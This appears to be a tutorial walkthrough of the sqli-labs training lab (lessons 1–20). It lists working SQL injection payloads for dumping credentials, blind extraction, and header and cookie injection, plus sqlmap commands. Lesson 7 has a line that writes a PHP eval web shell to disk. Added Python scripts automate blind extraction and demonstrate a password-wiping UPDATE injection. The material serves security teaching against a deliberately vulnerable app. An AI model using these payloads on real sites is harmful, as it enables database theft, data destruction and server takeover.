A note before reading: for reasons of length I am only covering the beginner part here; if it were any longer, probably nobody would read to the end. Many of the payloads inside are repetitive. If you are practising, don't copy and paste: type them yourself a few times until they are fluent, and for the blind-injection part also type the wrong variants and compare the results. If you want more payloads, search Baidu, or the Firefox HackBar add-on has plenty, so I won't go into that here. If there are mistakes, please point them out frankly, and if you have better solutions feel free to discuss them in the comments. I hope readers can learn the principles of manual injection from this article; I stepped into a lot of pitfalls myself. When practising, work mainly by hand, combine it with tools where appropriate, and learn to read the source code and analyse it.
less-1 GET string-type injection (error-based)
Closure test:
?id=1\
Payload:
?id=1' order by 3 --+
Payload to get the tables:
?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
Payload to get the columns:
?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
Payload to get the records:
?id=0' union select 1,group_concat(username,0x3a,password),3 from users --+

less-2 GET numeric-type injection (error-based)
Closure test:
?id=1\
Payload:
?id=0 union select 1,user(),database() --+

less-3 GET single-quote-plus-parenthesis injection (error-based)
Closure test:
?id=1\
Payload:
?id=1') --+

less-4 GET double-quote-plus-parenthesis injection (error-based)
Closure test:
?id=1\
Payload:
?id=1") --+

less-5 GET single-quote injection (blind; extracting data from error messages)
Closure test:
?id=1\
Payload:
?id=1' --+
Payload to get the database:
?id=0' union select 1,2,3 from (select count(*),concat((select concat(version(),':',database(),':',user(),':') limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
Payload to get the tables:
?id=0' union select 1,2,3 from (select count(*),concat((select concat(table_name,':') from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
Payload to get the user records:
?id=0' union select 1,2,3 from (select count(*),concat((select concat(id,':',username,':',password,':') from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

less-6 GET double-quote injection (blind; extracting data from error messages)
Closure test:
?id=1\
Payload:
?id=1" --+
Payload to get the database:
?id=0" union select 1,2,3 from (select count(*),concat((select concat(version(),':',database(),':',user(),':') limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
Payload to get the tables:
?id=0" union select 1,2,3 from (select count(*),concat((select concat(table_name,':') from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
Payload to get the user records:
?id=0" union select 1,2,3 from (select count(*),concat((select concat(id,':',username,':',password,':') from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

less-7 GET single-quote injection (blind; file read/write)
Closure test:
?id=0')) or 1=1 --+ | ?id=0")) or 1=1 --+
Payload:
?id=0')) --+
Read payload:
?id=0')) union select 1,load_file("D:\\bch.txt"),3 --+
Write payload:
?id=0')) union select 1,"<?php @eval($_POST[cmd]); ?>",3 into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\sqli\\Less-7\\shell.php" --+

less-8 GET single-quote injection (boolean-based blind)
Closure test:
?id=0' or 1=1 --+ | ?id=0" or 1=1 --+
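To automate the checks this lesson performs by hand, here is an added Python example (it is not code from the original post or from sqli-labs). It drives the same `length(database())` and `ascii(substr(database(),i,1))` conditions through a true/false oracle, but replaces one-value-per-request guessing with a binary search. The target is a constructed SQLite stand-in for the Less-8 backend: the real lesson runs MySQL, so `ascii()` and `database()` are shimmed to let the MySQL-style payloads run unchanged, and the database name `security` and the user rows are assumed sample data.

```python
import sqlite3

DB_NAME = "security"  # assumption: database name of the sqli-labs install


def build_target():
    """Constructed in-memory stand-in for the Less-8 backend (sample rows)."""
    conn = sqlite3.connect(":memory:")
    # MySQL built-ins the page's payloads rely on; SQLite lacks them.
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    conn.create_function("database", 0, lambda: DB_NAME)
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?,?,?)",
                     [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    return conn


def less8_page(conn, id_param):
    """The vulnerable endpoint: $id is pasted into the query, and, as in
    Less-8, neither rows nor SQL errors are echoed, only a fixed banner
    when the query returns a row."""
    sql = f"SELECT username, password FROM users WHERE id='{id_param}' LIMIT 0,1"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        row = None
    return "You are in..........." if row else ""


def make_boolean_oracle(conn):
    """id=1 is a real row, so the banner appears exactly when the injected
    condition is true. That single bit is the whole side channel."""
    def ask(condition):
        return "You are in" in less8_page(conn, f"1' and {condition} --+")
    return ask


class BlindExtractor:
    """Turns a true/false oracle over SQL conditions into string extraction."""

    def __init__(self, ask):
        self.ask = ask
        self.requests = 0

    def _check(self, condition):
        self.requests += 1
        return self.ask(condition)

    def _bisect(self, lhs, lo, hi):
        """Find v in [lo, hi] with lhs == v using only '>' questions:
        about log2(hi - lo) requests instead of one per candidate value."""
        lo0, hi0 = lo, hi
        while lo < hi:
            mid = (lo + hi) // 2
            if self._check(f"{lhs}>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        if not self._check(f"{lhs}={lo}"):  # guard: value outside the range
            raise RuntimeError(f"{lhs} not in [{lo0}, {hi0}]")
        return lo

    def extract(self, expr, max_len=64):
        """Recover the string value of a SQL expression, e.g. database()."""
        length = self._bisect(f"length({expr})", 0, max_len)
        chars = []
        for i in range(1, length + 1):
            # Assumption: printable ASCII, the range the page's payloads probe.
            code = self._bisect(f"ascii(substr({expr},{i},1))", 32, 126)
            chars.append(chr(code))
        return "".join(chars)


def demo():
    """Extract database() and one username; returns them and the request count."""
    conn = build_target()
    ex = BlindExtractor(make_boolean_oracle(conn))
    db = ex.extract("database()")
    user2 = ex.extract("(select username from users where id=2)")
    return db, user2, ex.requests


if __name__ == "__main__":
    print(demo())
```

The extractor depends only on the oracle, so for the time-based lessons it is reused as-is with an oracle that wraps the condition in `if(<cond>,sleep(3),null)` and compares the response time against a threshold; the page's own time-based payloads are that oracle written out by hand. Keep the threshold well above normal latency jitter, because every wrong answer sends the binary search down the wrong branch and silently corrupts one character.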
Payload:
?id=1' and length(database())=8 --+
?id=1' and ascii(substr(database(),1,1))=115 --+

less-9 GET single-quote injection (time-based blind)
Closure test:
?id=0' or if(1=1,sleep(3),null) --+ | ?id=0" or if(1=1,sleep(3),null) --+
Payload:
?id=0' or if(ascii(substr(database(),1,1))=115,sleep(3),null) --+
?id=0' or if(length(database())=8,sleep(3),null) --+

less-10 GET double-quote injection (time-based blind)
Closure test:
?id=0' or if(1=1,sleep(3),null) --+ | ?id=0" or if(1=1,sleep(3),null) --+
Payload:
?id=0" or if(ascii(substr(database(),1,1))=115,sleep(3),null) --+
?id=0" or if(length(database())=8,sleep(3),null) --+

less-11 POST single-quote injection (error-based)
Closure test:
uname=1\
Payload:
uname=0' order by 2 --+
uname=0' union select user(),database() --+
uname=0' or 1=1 --+

less-12 POST double-quote-plus-parenthesis injection (error-based)
Closure test:
uname=1\
Payload:
uname=0") order by 2 --+
uname=0") union select user(),database() --+
uname=0") or 1=1 --+

less-13 POST single-quote-plus-parenthesis injection (blind; extracting data from error messages)
Closure test:
uname=1\
Payload:
uname=1') --+
Payload to get the database:
uname=0') union select 1,2,3 from (select count(*),concat((select concat(version(),':',database(),':',user(),':') limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
Payload to get the tables:
uname=0') union select 1,2,3 from (select count(*),concat((select concat(table_name,':') from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
Payload to get the user records:
uname=0') union select 1,2,3 from (select count(*),concat((select concat(id,':',username,':',password,':') from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

less-14 POST double-quote injection (blind; extracting data from error messages)
Closure test:
uname=1\
Payload:
uname=1" --+
Payload to get the database:
uname=0" union select 1,2,3 from (select count(*),concat((select concat(version(),':',database(),':',user(),':') limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
Payload to get the tables:
uname=0" union select 1,2,3 from (select count(*),concat((select concat(table_name,':') from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
Payload to get the user records:
uname=0" union select 1,2,3 from (select count(*),concat((select concat(id,':',username,':',password,':') from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

less-15 POST single-quote injection (time-based blind; true and false give the same response)
Closure test:
uname=0' or if(1=1,sleep(3),null) --+ | uname=0" or if(1=1,sleep(3),null) --+
Payload:
uname=0' or if(ascii(substr(database(),1,1))=115,sleep(3),null) --+
uname=0' or if(length(database())=8,sleep(3),null) --+

less-16 POST double-quote-plus-parenthesis injection (time-based blind and boolean-based blind; true and false give different responses)
Closure test:
uname=0') or 1=1 --+ | uname=0") or 1=1 --+
Payload:
uname=0") or ascii(substr(database(),1,1))=115 --+
uname=0") or length(database())=8 --+
sqlmap -r target.txt --batch --level=2  // this time-based blind vulnerability is only detected at level >= 2

less-17 POST uname filtered (passwd injection)
Closure test:
uname=admin&passwd=0' or if(1=1,sleep(3),null) --+ | uname=admin&passwd=0" or if(1=1,sleep(3),null) --+
This works because the injectable SQL statement is:
UPDATE users SET password='$passwd' WHERE username='admin'
From the code analysis, the trigger condition is that the preceding SQL query returns a row, i.e.
SELECT username, password FROM users WHERE username=$uname LIMIT 0,1
must not be empty, so the submitted uname='admin' must be an existing username.
Payload:
uname=admin&passwd=0' or '1'='1
uname=admin&passwd=0' and updatexml(1,concat(0x7e,concat((select database()),':',(select user()),':',(select @@version)),0x7e),1) or '1'='1
uname=admin&passwd=0' and extractvalue(1,concat(0x7e,concat((select database()),':',(select user()),':',(select @@version)),0x7e)) or '1'='1
Note: when injecting into UPDATE, INSERT and similar statements, do not comment out the rest of the statement with --+; close it with or '1'='1 instead. Commenting out the tail also throws away the WHERE clause (this UPDATE does accept --+, at the cost of setting every user's password to 0).
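To see what the two closing styles in the note above actually do to the table, here is an added Python example (not code from the original post or from sqli-labs). It runs the lesson's UPDATE in a constructed SQLite stand-in; the user rows are made-up sample data, and only the SQL shape is the one shown above.

```python
import sqlite3

# Constructed sample rows (not sqli-labs' seed data); 'admin' is the account
# the lesson's payloads are sent with.
SEED_ROWS = [("Dumb", "Dumb"), ("Angelina", "I-kill-you"), ("admin", "admin")]


def build_target():
    """Fresh in-memory users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?,?)", SEED_ROWS)
    return conn


def less17_reset_password(conn, uname, passwd):
    """The vulnerable flow as the lesson describes it: uname is filtered, so
    the lookup is done safely here; the username that comes back is reused
    in the UPDATE, and passwd is concatenated in unfiltered."""
    row = conn.execute("SELECT username FROM users WHERE username=? LIMIT 0,1",
                       (uname,)).fetchone()
    if row is None:
        return 0  # trigger condition not met: no UPDATE runs at all
    sql = f"UPDATE users SET password='{passwd}' WHERE username='{row[0]}'"
    return conn.execute(sql).rowcount  # rows the single UPDATE touched


def passwords(conn):
    """Snapshot of username -> password after the request."""
    return dict(conn.execute("SELECT username, password FROM users"))


def demo(payload):
    """Run one passwd payload against a fresh table; returns (rows hit, table)."""
    conn = build_target()
    hit = less17_reset_password(conn, "admin", payload)
    return hit, passwords(conn)


if __name__ == "__main__":
    print(demo("0' or '1'='1"))  # 1 row: admin's password becomes the boolean result 1
    print(demo("0' --+"))        # 3 rows: WHERE commented away, every password is now 0
```

The `or '1'='1` form still matches only the looked-up user, and sets the password to the value of the expression `'0' or '1'='1'`, which is 1. The `--+` form drops the WHERE clause and rewrites every row, which is the "every password becomes 0" outcome the note warns about and the reason the later lessons log in with passwd='0'. On a real engagement the second form is a data-destroying write, so test UPDATE/INSERT injection points with the closing style, never the commenting style.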
sqlmap -r target.txt -p passwd --batch

less-18 POST uname and passwd filtered (User-Agent injection)
Closure test:
User-Agent: <value>\
The injectable SQL statement is:
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)
From the code analysis, the trigger condition is that the login query returns a row, i.e.
SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1
must not be empty, so the submitted uname='admin', passwd='0' must be a valid login.
Note: the password is 0 here because of the injection executed in Less-17; adjust it to whatever your own password is.
Payload:
User-Agent: <value>' or '1'='1
User-Agent: <value>' and updatexml(1,concat(0x7e,concat((select database()),':',(select user()),':',(select @@version)),0x7e),1) or '1'='1
User-Agent: <value>' and extractvalue(1,concat(0x7e,concat((select database()),':',(select user()),':',(select @@version)),0x7e)) or '1'='1
sqlmap -r target.txt --batch  // mark the injection point as User-Agent: <value>* in the request file, or use level=3 or higher

less-19 POST uname and passwd filtered (Referer injection)
Closure test:
Referer: <site-url>\
Same analysis as above: the submitted uname='admin', passwd='0' must be a valid login.
Payload:
Referer: <site-url>' or '1'='1
Referer: <site-url>' and updatexml(1,concat(0x7e,concat((select database()),':',(select user()),':',(select @@version)),0x7e),1) or '1'='1
Referer: <site-url>' and extractvalue(1,concat(0x7e,concat((select database()),':',(select user()),':',(select @@version)),0x7e)) or '1'='1
sqlmap -r target.txt --batch  // mark the injection point as Referer: <site-url>* in the request file, or use level=3 or higher

less-20 uname and passwd filtered (Cookie injection)
Closure test:
Cookie: uname=admin\
A Cookie only exists after logging in, so first submit the correct uname='admin', passwd='0' to log in, then refresh the page and intercept the Cookie. The injectable statement is:
SELECT * FROM users WHERE username='$cookee' LIMIT 0,1
From the code analysis, the trigger condition is that the user has logged in (submitted the POST form); once logged in, this injectable statement is executed, so log in, refresh the page, intercept the Cookie and inject into it.
Payload:
Cookie: uname=admin' or '1'='1
Cookie: uname=admin' and updatexml(1,concat(0x7e,concat((select database()),':',(select user()),':',(select @@version)),0x7e),1) or '1'='1
Cookie: uname=admin' and extractvalue(1,concat(0x7e,concat((select database()),':',(select user()),':',(select @@version)),0x7e)) or '1'='1
Note: here either commenting with --+ or closing with or '1'='1 works, because the injectable statement is a SELECT.
sqlmap -r target.txt --batch

To be continued...